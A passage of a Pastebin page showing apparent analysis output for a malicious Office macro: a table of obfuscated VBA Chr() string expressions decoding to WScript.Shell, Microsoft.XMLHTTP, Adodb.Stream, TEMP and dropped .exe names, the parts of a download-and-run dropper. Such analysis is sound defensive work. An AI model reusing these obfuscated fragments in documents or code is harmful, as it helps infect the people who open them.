  634. | VBA string | /43g5few.exe         | Chr(47) & "4" & Chr(51) & Chr(103) &    |
  635. |            |                      | "5" & "f" & Chr(101) & "w" & Chr(46) &  |
  636. |            |                      | "e" & Chr(120) & "e"                    |
  637. | VBA string | %BROWSER%            | environ( "BROWSER" )                    |
  638. | VBA string | WScript              | Chr(87) & Chr(80 + 3) & Chr(99) &       |
  639. |            |                      | Chr(114) & Chr(105) & Chr(112) &        |
  640. |            |                      | Chr(116)                                |
  641. | VBA string | hell                 | Chr(104) & Chr(101) & Chr(108) &        |
  642. |            |                      | Chr(108)                                |
  643. | VBA string | Process              | (Chr(80) & Chr(114) & "o" & Chr(99) &   |
  644. |            |                      | Chr(101) & "s" & "s")                   |
  645. | VBA string | TEMP                 | ("T" & Chr(69) & Chr(77) & Chr(80))     |
  646. | VBA string | Adodb.Stream         | (Chr(65) & "do" & Chr(100) & Chr(98) &  |
  647. |            |                      | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
  648. |            |                      | & Chr(101) & "a" & Chr(109))            |
  649. | VBA string | \rrdDhhm.exe         | "\" & "rrd" & Chr(68) & "hhm." & "e" &  |
  650. |            |                      | Chr(120) & "e"                          |
  651. | VBA string | Shell;<=.Application | (Chr(83) & "h" & "e" & Chr(108) &       |
  652. |            |                      | Chr(108) & ";<=" + Chr(46) & Chr(65) &  |
  653. |            |                      | "p" & Chr(112) & Chr(108) & Chr(105) &  |
  654. |            |                      | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
  655. |            |                      | & Chr(111) & Chr(110))                  |
  656. | VBA string | '  and mes='         | "' " & " and mes='"                     |
  657. | VBA string | Microsoft.XMLHTTP    | (Chr(77) & Chr(105) & "c" & Chr(114) &  |
  658. |            |                      | Chr(111) & Chr(115) & Chr(111) &        |
  659. |            |                      | Chr(102) & "t" & Chr(46) & Chr(88) &    |
  660. |            |                      | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
  661. |            |                      | & "P")                                  |
  662. | VBA string | Comunicarse con      | "Comunicarse con Sistemas " & Chr(13) & |
  663. |            | Sistemas             | Chr(10)                                 |
  664. |            |                      |                                         |
  665. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!